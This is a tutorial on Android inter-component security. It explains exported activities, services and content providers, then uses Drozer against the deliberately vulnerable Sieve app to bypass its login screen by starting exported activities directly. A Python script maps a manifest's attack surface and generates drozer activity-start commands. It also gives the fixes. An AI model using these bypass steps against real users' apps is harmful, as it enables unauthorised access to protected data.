Android applications communicate with each other through Binder, the IPC (Inter-Process Communication) driver in the Android kernel. An application exposes itself to other apps through four kinds of components, each of which is reached with an Intent that the system delivers over Binder.
Android Components
- Activities - An activity represents a single screen with a user interface. An example of an activity would be a login page.
- Services - A service is a component that runs in the background to perform long-running operations and has no UI. An example of a service would be music that keeps playing while the user is in a different application.
- Broadcast Receivers - A broadcast receiver is a component that responds to system-wide broadcast announcements. A broadcast may announce that the battery is low or that a picture was captured. Apps can also send their own broadcasts - for example to let other apps know that some data has been downloaded to the device and is available for them to use.
- Content Providers - A content provider supplies data from one application to others on request. The data behind it can live in the file system, an SQLite database or any other persistent storage location the app can access.
Defining Components
Each Android Package (APK) contains a file named AndroidManifest.xml. This file holds information such as the package name, the minimum and target Android versions, and the list of activities, services, broadcast receivers and content providers. Only components declared in the manifest can be used; the one exception is broadcast receivers, which an app can also register at runtime with Context.registerReceiver().
One of the most important aspects of securing components in the manifest is to control who can reach them: set android:exported to false on anything other apps do not need, and protect components that must be exported with an android:permission (ideally a signature-level one) rather than relying on the user interface to keep them out of reach.
In Android a component is public (exported) when android:exported is set to true. If the attribute is not set at all, the component is still public whenever the manifest declares an intent filter for it; content providers were additionally public by default when the app targeted an API level below 17. Since Android 12 the platform refuses to install an app that declares an intent filter without an explicit android:exported value, but apps targeting older versions still rely on these defaults, so check both the attribute and the intent filters.
Attacking Components
In this tutorial we will use Drozer to analyze an Android application, determine which components are exported and, where they are, see how they can be attacked.
We will use a deliberately vulnerable Android application created by MWR InfoSecurity called Sieve. Sieve is a password manager that lets a user save passwords and uses a master password and PIN to encrypt the passwords stored in its database.
Analyzing the Manifest File
After you install the application you can find its package name by listing the installed packages from the drozer console (the app.package.list module, filtered on the application's name) with the command below.
Drozer can also dump the manifest file; the command below (the app.package.manifest module) returns the whole manifest.
An easier way to check for exported components is the attack-surface summary (the app.package.attacksurface module) shown below. For Sieve it reports 3 activities, 2 content providers and 2 services exported.
Exploiting Activities
As mentioned earlier, activities are individual user interfaces. Developers need to be careful about which activities they export in the manifest file. The Sieve application demonstrates how the application's authentication page can be bypassed because of a misconfigured (exported) activity.
We have determined that 3 activities are exported; run the command below (the app.activity.info module) to identify them.
When a user opens the Sieve application they must enter the master password and PIN on the authentication page. Since the other exported activities can be started directly by any app on the device, we can try to bypass this page (MainLoginActivity) by invoking one of them from drozer with the app.activity.start module, as shown below.
By invoking this activity directly we have bypassed the authentication page without entering a password or PIN. The login screen only sits in front of the protected screen in the normal flow; nothing stops another app from starting the protected screen itself. The fix is to mark such activities android:exported="false" (or protect them with a permission) and to have each activity verify that the user has authenticated rather than assume it.
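The two steps above, working out the attack surface from the manifest rules in the Defining Components section and then starting the exported activities that are not the login screen, can be reproduced offline. The script below is an added example written for this page; it is not drozer's code and not Sieve's real manifest. The manifest it parses is constructed for the example (component names follow Sieve's, and the exported counts match the 3 activities, 2 providers and 2 services reported above), and the drozer console lines it generates use the real app.activity.start module syntax.

```python
"""Attack-surface check for an AndroidManifest.xml, modelled on what
drozer's app.package.attacksurface reports (added example, not drozer code)."""
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace
KINDS = {"activity": "activity", "activity-alias": "activity",
         "service": "service", "receiver": "receiver", "provider": "provider"}

# Constructed manifest (an assumption for this example, not a dump of Sieve's
# real manifest). Component names follow Sieve's; exported counts match the
# tutorial: 3 activities, 2 services, 2 providers, 0 receivers.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.mwr.example.sieve">
  <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="17"/>
  <application android:debuggable="true" android:label="Sieve">
    <activity android:name=".MainLoginActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".PWList" android:exported="true"/>
    <activity android:name=".FileSelectActivity" android:exported="true"/>
    <activity android:name=".AddEntryActivity"/>
    <service android:name=".AuthService" android:exported="true"/>
    <service android:name=".CryptoService" android:exported="true"/>
    <provider android:name=".DBContentProvider" android:exported="true"
              android:authorities="com.mwr.example.sieve.DBContentProvider"/>
    <provider android:name=".FileBackupProvider" android:exported="true"
              android:authorities="com.mwr.example.sieve.FileBackupProvider"/>
  </application>
</manifest>
"""


def full_name(pkg, name):
    """Expand the short forms allowed in android:name (".PWList", "PWList")."""
    if name.startswith("."):
        return pkg + name
    if "." not in name:
        return pkg + "." + name
    return name


def is_exported(elem, kind, target_sdk):
    """Platform export rules: an explicit android:exported wins; otherwise an
    <intent-filter> makes the component public; otherwise providers were
    public by default when the app targeted an API level below 17."""
    exported = elem.get(A + "exported")
    if exported is not None:
        return exported.strip().lower() == "true"
    if elem.find("intent-filter") is not None:
        return True
    return kind == "provider" and target_sdk < 17


def attack_surface(manifest_xml):
    """Return the exported components of a manifest, grouped by kind."""
    root = ET.fromstring(manifest_xml)
    pkg = root.get("package")
    target_sdk = 1
    uses_sdk = root.find("uses-sdk")
    if uses_sdk is not None:  # targetSdkVersion defaults to minSdkVersion
        target_sdk = int(uses_sdk.get(A + "targetSdkVersion")
                         or uses_sdk.get(A + "minSdkVersion") or 1)
    app = root.find("application")
    result = {"package": pkg,
              "debuggable": (app.get(A + "debuggable") or "false").lower() == "true",
              "exported": {"activity": [], "service": [], "receiver": [], "provider": []}}
    for elem in app:
        kind = KINDS.get(elem.tag)
        if kind is None or not is_exported(elem, kind, target_sdk):
            continue
        result["exported"][kind].append({
            "name": full_name(pkg, elem.get(A + "name")),
            "permission": elem.get(A + "permission"),  # None: any app can reach it
        })
    result["counts"] = {k: len(v) for k, v in result["exported"].items()}
    return result


def drozer_start_commands(surface, skip=()):
    """drozer console lines that start each exported, unprotected activity
    (the 'invoke one of the other activities' step of the tutorial)."""
    pkg = surface["package"]
    return ["run app.activity.start --component %s %s" % (pkg, act["name"])
            for act in surface["exported"]["activity"]
            if act["name"] not in skip and act["permission"] is None]


if __name__ == "__main__":
    s = attack_surface(SAMPLE_MANIFEST)
    print("Attack surface of %s (debuggable=%s):" % (s["package"], s["debuggable"]))
    for kind, items in s["exported"].items():
        print("  %d %s(s) exported" % (len(items), kind))
        for it in items:
            print("    %s  permission=%s" % (it["name"], it["permission"]))
    print("Activities to try instead of the login screen:")
    for cmd in drozer_start_commands(s, skip=(s["package"] + ".MainLoginActivity",)):
        print("  dz> " + cmd)
```

Point it at a manifest pulled from a real APK (decoded with apktool or aapt) and compare its counts with drozer's attacksurface output; a difference usually means an intent filter or a pre-17 provider default that was overlooked. Activities that carry an android:permission are listed as exported but left out of the start commands, since drozer's agent would need that permission to reach them.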